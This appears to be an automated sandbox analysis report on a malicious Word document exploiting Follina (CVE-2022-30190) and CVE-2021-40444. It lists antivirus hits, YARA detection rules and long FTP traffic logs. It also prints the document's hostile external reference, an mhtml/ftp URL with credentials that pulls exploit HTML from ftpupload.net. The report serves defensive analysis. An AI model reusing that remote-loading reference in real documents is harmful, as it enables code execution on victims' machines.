Windows Analysis Report
v4nkfHg4d9.doc

Overview

General Information

Sample Name: v4nkfHg4d9.doc
Analysis ID: 706117
MD5: cbc307d6059925e9abbdbdec4d9ec0c1
SHA1: 8f0fc563f43cc1422b523a21f01858e031761e5f
SHA256: 8d61ea9ef38b6e7b36f466299223ad43339080d3a9914059c88ca3dd6be5cd32
Tags: doc
Infos:

Detection

CVE-2021-40444, Follina CVE-2022-30190
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Detected CVE-2021-40444 exploit
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Contains an external reference to another file
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Uses FTP
Potential document exploit detected (performs DNS queries)

Classification

AV Detection

barindex
Source: v4nkfHg4d9.doc Avira: detected
Source: v4nkfHg4d9.doc ReversingLabs: Detection: 24%
Source: v4nkfHg4d9.doc Virustotal: Detection: 37% Perma Link
Source: ftpupload.net Virustotal: Detection: 7% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html Avira: detection malicious, Label: JS/CVE-2022-30190.G
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html Avira: detection malicious, Label: JS/CVE-2022-30190.G

Exploits

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED
Source: document.xml.rels Extracted files from sample: mhtml:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html!x-usc:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180
Source: global traffic TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21
Source: global traffic DNS query: name: ftpupload.net
Source: global traffic TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657
Source: Joe Sandbox View ASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB
Source: unknown FTP traffic detected: 185.27.134.11:21 -> 192.168.2.22:49179 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 380 of 6900 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 380 of 6900 allowed.220-Local time is now 05:31. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 380 of 6900 allowed.220-Local time is now 05:31. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 380 of 6900 allowed.220-Local time is now 05:31. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 60 seconds of inactivity.
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{401971E5-55A6-4DE4-A031-DD1C92F91BDD}.tmp Jump to behavior
Source: unknown DNS traffic detected: queries for: ftpupload.net
Source: dump.pcap, type: PCAP Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: dump.pcap, type: PCAP Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: dump.pcap, type: PCAP Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: document.xml.rels, type: SAMPLE Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
Source: v4nkfHg4d9.doc ReversingLabs: Detection: 24%
Source: v4nkfHg4d9.doc Virustotal: Detection: 37%
Source: v4nkfHg4d9.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\v4nkfHg4d9.doc
Source: v4nkfHg4d9.doc OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$nkfHg4d9.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6AC3.tmp Jump to behavior
Source: classification engine Classification label: mal92.expl.evad.winDOC@1/17@1/1
Source: v4nkfHg4d9.doc OLE document summary: title field not present or empty
Source: v4nkfHg4d9.doc OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: v4nkfHg4d9.doc Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: document.xml.rels Extracted files from sample: mhtml:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html!x-usc:ftp://epiz_32594997:fkmeetiwdg@ftpupload.net/htdocs/a.html
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
